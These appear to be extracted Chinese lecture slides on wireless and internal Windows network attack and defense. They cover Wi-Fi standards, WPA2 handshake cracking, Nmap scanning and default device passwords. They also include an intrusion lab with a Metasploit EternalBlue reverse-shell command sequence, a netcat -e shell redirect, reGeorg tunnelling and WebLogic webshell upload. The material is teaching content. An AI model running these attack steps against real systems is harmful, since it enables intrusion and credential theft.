网络攻击与防护 课件 第8、9章 无线网络攻防技术、内网Windows环境攻击实践

无线网络攻防技术无线网络攻防概述无线网络攻击无线局域网-WLANWLAN（WirelessLocalAreaNetwork，无线局域网），以无线信道作传输媒介的计算机局域网，是有线联网方式的重要补充和延伸。广泛适用于需要可移动数据处理或无法进行物理传输介质布线的领域随着IEEE802.11无线网络标准的制定与发展，使无线网络技术更加成熟与完善。WLAN产品主要包括：无线接入点、无线网卡、无线路由器、无线网关、无线网桥等无线局域网基本概念无线局域网的传输媒质分为无线电波和光波两类无线电波主要使用无线电波和微波，光波主要使用红外线无线电波和微波频率由各个国家的无线电管理部门规定，分为专用频段和自由频段。专用频段需要经过批准的独自有偿使用的频段；自由频段主要是指ISM频段（Industrical，Scientific，Medical）什么是Wi-Fi？WiFi的全称是WirelessFidelity，又叫802.11标准，是IEEE定义的一个无线网络通信的工业标准该技术使用的使2.4GHz或者5.0GHz附近的频段802.11b最高带宽为11Mbps，802.11g最高达54Mbps，802.11n则可达600Mbps其主要特性为：速度快，可靠性高，在开放性区域，通讯距离可达305米，在封闭性区域，通讯距离为76米到122米，方便与现有的有线以太网络整合，组网的成本更低WLAN与Wi-Fi的区别？Wlan是无线网络的缩写，又叫做无线局域网。WIFI是无线网络中的一个标准，比如说那些IEEE802.11a、b、g、n之类的都属于WIFI这个标准。802.11标准802.11 1997年IEEE无线局域网标准制定802.11b 2.4GHz直序扩频传输速率1Mbps-11Mbps802.11a 5GHz正交频分复用传输速率6Mbps-54Mbps802.11g 2.4GHz，兼容802.11b，传输速率到22Mbps802.1x基于端口的访问控制协议（Portbasednetworkaccesscontrolprotocol）802.11i 增强WIFI数据加密和认证（WPA，RSN）802.11e QoS服务802.11n 更高质量，更高速度，达到以太网性能水平WAPI 国标GB15629.11-2003无线局域网鉴别与保密基础结构（WAI

WPI）IEEE802.11802.11标准1990年IEEE802标准化委员会成立IEEE802.11无线局域网标准工作组该标准定义物理层和媒体访问控制(MAC)规范物理层定义了数据传输的信号特征和调制，工作在2.4000～2.4835GHz频段IEEE802.11是IEEE最初制定的一个无线局域网标准，主要用于难于布线的环境或移动环境中计算机的无线接入，由于传输速率最高只能达到2Mbps，所以，业务主要被用于数据的存取IEEE802.11a802.11标准1999年，IEEE802.11a标准制定完成，该标准规定无线局域网工作频段在5.15～5.825GHz，数据传输速率达到54Mbps/72Mbps(Turbo)，传输距离控制在10～100米802.11a采用正交频分复用（OFDM）的独特扩频技术可提供25Mbps的无线ATM接口和10Mbps的以太网无线帧结构接口，以及TDD/TDMA的空中接口支持语音、数据、图像业务；一个扇区可接入多个用户，每个用户可带多个用户终端IEEE802.11b802.11标准1999年9月IEEE802.11b被正式批准，该标准规定无线局域网工作频段在2.4～2.4835GHz，数据传输速率达到11Mbps该标准是对IEEE802.11的一个补充，采用点对点模式和基本模式两种运作模式，在数据传输速率方面可以根据实际情况在11Mbps、5.5Mbps、2Mbps、1Mbps的不同速率间自动切换，而且在2Mbps、1Mbps速率时与802.11兼容802.11b使用直接序列（DirectSequence）DSSS作为协议802.11b和工作在5GHz频率上的802.11a标准不兼容由于价格低廉，802.11b产品已经被广泛地投入市场，并在许多实际工作场所运行IEEE802.11e/f/h802.11标准IEEE802.11e标准对无线局域网MAC层协议提出改进，以支持多媒体传输，以支持所有无线局域网无线广播接口的服务质量保证QoS机制IEEE802.11f，定义访问节点之间的通信，支持IEEE802.11的接入点互操作协议（IAPP）IEEE802.11h用于802.11a的频谱管理技术IEEE802.11g802.11标准IEEE的802.11g标准是对流行的802.11b（即Wi-Fi标准）的提速（速度从802.11b的11Mb/s提高到54Mb/s）802.11g接入点支持802.11b和802.11g客户设备。同样，采用802.11g网卡的笔记本电脑也能访问现有的802.11b接入点和新的802.11g接入点802.11a的主要缺点是不能和802.11b设备互操作，而且与802.11b相比，802.11a网卡贵50%，接入点贵35%IEEE802.11n802.11标准Wi－Fi联盟在802.11a/b/g后面的一个无线传输标准协议可以将WLAN的传输速率由目前802.11a及802.11g提供的54Mbps，提高到300Mbps甚至高达600Mbps802.11n标准至2009年才得到IEEE的正式批准，但采用MIMOOFDM技术的厂商已经很多，包括D－Link，Airgo、Bermai、Broadcom以及杰尔系统、Atheros、思科、Intel等等，产品包括无线网卡、无线路由器等，而且已经大量在PC、笔记本电脑中应用无线局域网主要组件无线局域网的主要组件包括无线网卡和接入点。1.无线网卡

无线网卡实际上是一种终端无线网络设备，它是需要在无线局域网的无线覆盖下通过无线连接网络进行上网使用的。2.接入点

接入点的作用相当于局域网集线器，它在无线局域网和有线网络之间传输数据。接入点通常是通过标准以太网线连接到有线网络上，并与无线设备进行通信。无线网络优点无线网络具有下列优点：(1)灵活性和移动性(2)安装便捷(3)易于进行网络规划和调整(4)故障定位容易(5)易于扩展无线网络缺点无线网络也具有下列缺点：

(1)性能无线局域网是依靠无线电波进行传输的。(2)速率无线速率是无线网络的关键参数，它表明了无线设备支持多少带宽，也就是说能有多少速率来互相连接。

(3)安全性无线网络容易遭到信息篡改，可以做到无声无息地对信息进行劫持。无线安全加密方式无线路由器主要提供三种无线安全加密方式，分别为：WEP（WiredEquivalentPrivacy）：WEP算法是一种可选的链路层安全机制，用来提供访问控制，数据加密和安全性检验等。WPA（WiFiProtectedAccess）：WPA是一种保护无线网络的安全协议，是一种比WEP强大的加密算法，使用预共享密钥和临时密钥完整性协议进行加密。WPA2（WiFiProtectedAccess2）：WPA2是基于WPA的一种新的加密方式。WPA2是WPA的升级版，新型的网卡、AP都支持WPA2加密。无线网络拓扑结构案例北京无线信息共用网RADIUS服务器RadiusServer网管服务器NMSServer计费服务器BillingServer企业内部网EnterpriseIntranetVPN网关INTERNETorInternationalWirelessISP接入控制器AccessControllor无线接入点AccessPoint无线局域网安全问题无线局域网安全风险

隐患1--信号泄漏信号泄漏未授权访问敏感数据窃取一台被部署在商业大厦上的无线接入点发射的信号，最远传输到3个街区外…隐患2--各种接入认证业务CMCCChinaNetChinaUnicomCECT-Chinacom…VPN+UDP53=Free！！隐患3--接入之后的杯具…登录凭证敏感数据更多隐私隐患3--接入之后的杯具…SessionHijack--作为中间人参与通信中--监听通信内容，截获敏感信息--代替某一方，接管会话--篡改正常数据，插入恶意数据隐患4--电信家用AP的噩梦隐患4-设备固件可能存在的漏洞口令验证绕过口令泄漏缓冲区溢出配置文件下载….隐患5--无线数据加密破解高强度128位WEP密码破解长度：128位用时：1分27秒捕获数据包：

47872个WPA破解Other…隐患6--无线拒绝服务攻击点到面的攻击区域性空间性基于链路层攻击--Airjack、File2air--Macfld、void11无线网络安全机制与防护措施通常网络的安全性主要体现在两个方面：一是访问控制，另一个是数据加密。常见措施：1.对无线网络进行加密2.设置MAC地址过滤3.使用静态IP地址4.改变服务集标识符并且禁止SSID广播5.采用身份验证和授权无线网络攻防概述无线网络攻击挖掘隐藏SSID在无线网络中，AP会定期广播SSID信息，向外通告无线网络的存在，无线用户使用无线网卡发现无线网络。为避免无线网络被非法用户通过SSID搜索到，可以禁用AP广播功能，隐藏SSID。但无线网卡连接无线网络时，需要手动添加SSID才能关联成功。SSID可以通过嗅探无线环境中的数据包获取。突破MAC过滤限制无线MAC地址过滤功能，就是允许或禁止指定的MAC地址连接无线网络，突破MAC地址过滤需要捕获正常连接的无线客户端MAC地址，然后更改MAC地址来伪造身份。破解WPA2口令WPA/WPA2目前只能通过字典破解，先抓取连接无线时四次握手过程中的数据包，然后通过暴力破解的方法破解抓取的握手包。这个数据包中含有预共享密钥，所抓取的数据包必须是认证过程中产生的数据包。因为WPA增加了身份认证机制，在没有通过认证的时候，只允许认证信息通过。所以在没有正确的预共享密钥的时候，是无法抓取到四步握手过程中的数据包。总结1、了解无线网络基本概念2、了解无线网络体系架构3、

掌握无线网络优缺点4、掌握无线网络安全机制与防护内网Windows环境攻击实践前言当我们在进行内网渗透中,经常会遇到一些环境问题,比如拿下的目标机和自身的机器均处于内网之中,这时候想要对目标机内网进行渗透就会遇到一系列的问题。比如我如何用扫描器扫对方的内网?我没公网IP如何远程登录对方内网主机?这些问题如何解决呢？CobaltStrike工具实验环境Web网站信息收集Web网站漏洞利用利用CobaltStrike获取Shell会话域环境信息收集域主机攻击CobaltStrike工具CobaltStrike是一款渗透测试工具，CobaltStrike分为客户端与服务端，服务端是单独一个，客户端可以有多个，可用于团队进行分布式协同操作。CobaltStrike工具结构团队服务器创建与连接CobaltStrike用户接口分为两部分，接口的顶部是会话或目标的图形展示，接口的底部展示了每个与之交互的会话标签页。用户接口如下图所示内网渗透SystemProfiler是一个为客户端攻击提供的侦察工具，工具启动一个本地的Web服务器，并对访问它的任何应用进行指纹识别。SystemProfiler提供一个它从用户的浏览器里发现的应用和插件的列表，也会尝试去发现代理服务器背后的用户的内网IP地址。CobaltStrike工具实验环境Web网站信息收集Web网站漏洞利用利用CobaltStrike获取Shell会话域环境信息收集域主机攻击实验环境过程整个实验过程大致如下：1) 攻击者对Web网站进行信息扫描，扫描结果显示7001端口开放，7001端口默认对应WebLogic服务，存在反序列化远程命令执行漏洞。2) 使用java反序列化终极测试工具上传木马到Web网站。3) 通过冰蝎连接Webshell木马并上传后门程序。4) 利用MS14-058(即CVE-2014-4113)将会话提权到system权限。5) 将Web网站作为跳板机进行内网渗透。6) 利用CobaltStrike抓取密码HASH值生成黄金票据，从而获取域控权限同时能够访问域内其他主机的任何服务。CobaltStrike工具实验环境Web网站信息收集Web网站漏洞利用利用CobaltStrike获取Shell会话域环境信息收集域主机攻击信息收集途径公开信息收集存活扫描端口扫描服务识别扫描系统类型识别漏洞扫描

针对口令的扫描

针对特定安全漏洞的扫描深入获取系统信息信息收集扫描工具－Nmap被称为是扫描器之王支持多种扫描技术目标和端口设定非常灵活扫描过程根据网络自动调整端口扫描－Nmap扫描目标端口：Nmap5Nmap–sS5(SYN方式)Nmap–sT5(TCP方式)扫描目标操作系统类型命令：Nmap–O-P05端口扫描－NmapNmap的其他参数：Nmap–sV5(显示Banner信息)Nmap–p1-505(指定端口范围)Nmap–v5(输出更详细信息)Nmap–F5(快速模式)Nmap–A5(强化扫描模式)Nmap–oXresult.xml5导出扫描结果到XML文件中Nmap--iflist显示所有网络接口--packet-trace跟踪显示每一个扫描数据包ZenmapZenmap——

图形界面的nmap常见端口号21FTP22SSH23Telnet25SMTP53DNS80HTTP110POP3161SNMP443HTTPS513RLogin1433MSSQLServer1521Oracle3306MySQL3389RDP8080ProxyNessus---综合漏洞扫描综合漏扫软件Nessus

Nessus个人使用可以到官网免费申请序列号

Nessus4.2版开始，不再有独立的客户端，而是基于Web来进行管理，一般是这样的形式：https://[ServerIP]:8834Nessus扫描策略Nessus查看扫描结果口令安全问题口令是很多应用系统认证用户采用的最广泛的认证方式，但是口令安全问题，给认证带来了很多安全隐患口令常见安全问题有如下表现：

弱口令

明文传输

默认值口令问题1——弱口令用户趋向于选择容易的口令，甚至空口令用户会选择易于记住的东西做口令 Test、guest、google、iphone等

名字、生日、简单数字等易于选择该系统的应用 NtServer、oracle等多数用户的安全意识薄弱口令问题2——明文传输使用明文密码传送的应用： FTP、POP、Telnet、HTTP、SNMP、Socks Mountd、Rlogin、NNTP、NFS、 ICQ、IRC、PcAnywhere、VNC等 MSSQL、Oracle等上述服务都容易成为攻击对象口令问题3——默认值网络设备 CiscoRouteruser:enablepw:cisco 3Com交换机user:adminpw:synnet TPLink无线路由：user:adminpw:adminModem等等数据库 MS-SQL：sa+空口令SNMP Public、Private口令攻击方式手工猜测

方法：社会工程学、尝试默认口令自动猜测

工具：John、LC、NTscan等窃听：登陆、网络截获、键盘监听

工具：Dsniff、SnifferPro、IKS等NtScan--破解Windows系统口令将生成的字典文件重命名为NT_pass.dic，覆盖Ntscan目录下的原字典文件NtScan--破解Windows系统口令运行NtScan，如果目标服务器密码在字典文件中存在，则会出现如下扫描结果：缓冲区溢出缓冲区溢出攻击原理

缓冲区溢出攻击利用编写不够严谨的程序，通过向程序的缓冲区写入超过预定长度的数据，造成缓存的溢出，从而破坏程序的堆栈，导致程序执行流程的改变。缓冲区溢出的危害

最大数量的漏洞类型。

漏洞危害等级高。国家漏洞库（CNNVD）漏洞统计缓冲区溢出基础-堆栈、指针、寄存器堆栈概念

一段连续分配的内存空间。堆栈特点

后进先出。

堆栈生长方向与内存地址方向相反。指针

指针是指向内存单元的地址。寄存器

暂存指令、数据和位址。 ESP（栈顶）、EBP（栈底）、EIP（返回地址）。34H12H78H56H0108HESP栈顶(AL)(AH)34H12H78H56H0106HESP栈顶缓冲区溢出简单示例程序作用：将用户输入的内容打印在屏幕上。Buffer.c#include<stdio.h>intmain(){

charname[8];printf("Pleaseinputyourname:");gets(name);printf("younameis:%s!",name);return0;}缓冲区溢出示例用户输入内容在8位以内时候，程序正常执行用户输入内容超过8位以后，程序执行产生错误缓冲区溢出简单示例由于返回地址已经被覆盖，函数执行返回地址时会将覆盖内容当作返回地址，然后试图执行相应地址的指令，从而产生错误。当我们全部输入a时，错误指令地址为0x616161，0x61是a的ASCII编码缓冲区溢出攻击危害如果可精确控制内存跳转地址，就可以执行指定代码，获得权限或破坏系统。寻找程序漏洞编制缓冲区溢出程序精确控制跳转地址执行设定的代码获得系统权限或破坏系统历史上经典的缓冲区溢出漏洞Rpc溢出SQLUDP溢出暴风影音2溢出Serv-U溢出漏洞Ms05039Ms06040Ms08067Ms17010（永恒之蓝）…缓冲区漏洞利用-Metasploit平台介绍溢出攻击平台—Metasploit实例—msf攻击ms-17010漏洞主机1.

searchms17_0102.use

exploit/windows/smb/ms17_010_eternalblue//运行payload3.

setpayloadwindows/x64/meterpreter/reverse_tcp//指定溢出成功后运行的代码，这里获取反弹端口的shell4.showoptionsinfo//查看漏洞信息与脚本参数5.setrhost38//设定攻击目标IP6.setlhost36//本机IP7.exploit//开始攻击8.shell//连接溢出成功后打开的shell终端内网渗透场景在我们进行内网渗透中,经常会遇到一些环境问题,比如拿下的目标机和自身的机器均处于内网之中,这时候想要对目标机内网进行渗透就会遇到一系列的问题.比如我如何用扫描器扫对方的内网?我没公网IP如何远程登录对方内网主机?…端口转发端口转发这个我们在内网渗透中也是经常遇到，可以使用现成的一些工具或者通过脚本命令进行转发常用的转发工具：Netcat、Lcx、Htran、FpipeNetcat是大家都很熟悉的一款软件了，功能十分强大，安全人员必备工具之一。NC使用NC使用：-e参数，例如：我们将一台win主机shell反弹到一台linux主机上，win上执行。在linux主机上监听此端口Sock代理Sock代理是一种基于传输层的网络代理协议,不同于VPN,Sock代理只能对使用该代理协议的程序生效,因此,可以说它是一种局部代理,而不是像VPN一样的全局代理，速度也弱于VPN。但在我们渗透测试中，需要尽量对目标机制造出尽可能小的影响，因此，sock代理也经常会被用到。Sock代理场景攻击端和内网主机处于同一网络环境下，或者攻击端具有公网IP，因为在服务器端运行sock脚本时会需要寻址到客户端。下面拓扑情况为攻击端无法直接访问内网主机：socks5代理（reGeorg+proxifier）reGeorgreGeorg是reDuh的继承者，利用了会话层的socks5协议，效率更高。proxifierProxifier是一款功能非常强大的socks5客户端，可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。工具配置工具配置先将reGeorg的对应脚本上传到服务器端，直接访问显示“Georgsays,'Allseemsfine'”，表示脚本运行正常工具配置运行py程序：

python

reGeorgSocksProxy.py

-p

8888

-u

http:

///test/tunnel.jsp工具配置将proxifier打开，在ProxyServer中这样配置工具配置在远程桌面程序上右键，以Proxifier选择“ProxySOCKS5”打开。ipconfig查询内网机器的ipCobaltStrike工具实验环境Web网站信息收集Web网站漏洞利用利用CobaltStrike获取Shell会话域环境信息收集域主机攻击WeblogicScan扫描漏洞漏洞检测结果打开终端，输入命令cd/home/WeblogicScan，切换到WeblogicScan目录，输入命令python3WeblogicScan.py07001，扫描结果显示存在CVE-2019-2725漏洞。WeblogicScan扫描漏洞反序列化漏洞在攻击主机的浏览器地址栏中输入0:7001/_async/AsyncResponseService，测试漏洞是否存在。利用Java反序列化终极测试工具上传木马使用Java反序列化终极测试工具上传木马到目标主机，目标服务器选择Weblogic，目标输入0:7001/，单击获取信息按钮，回显目标主机相关信息。反序列化终极测试工具利用冰蝎连接木马单击Webshell上传标签，上传冰蝎木马文件Webshell上传CobaltStrike工具实验环境Web网站信息收集Web网站漏洞利用利用C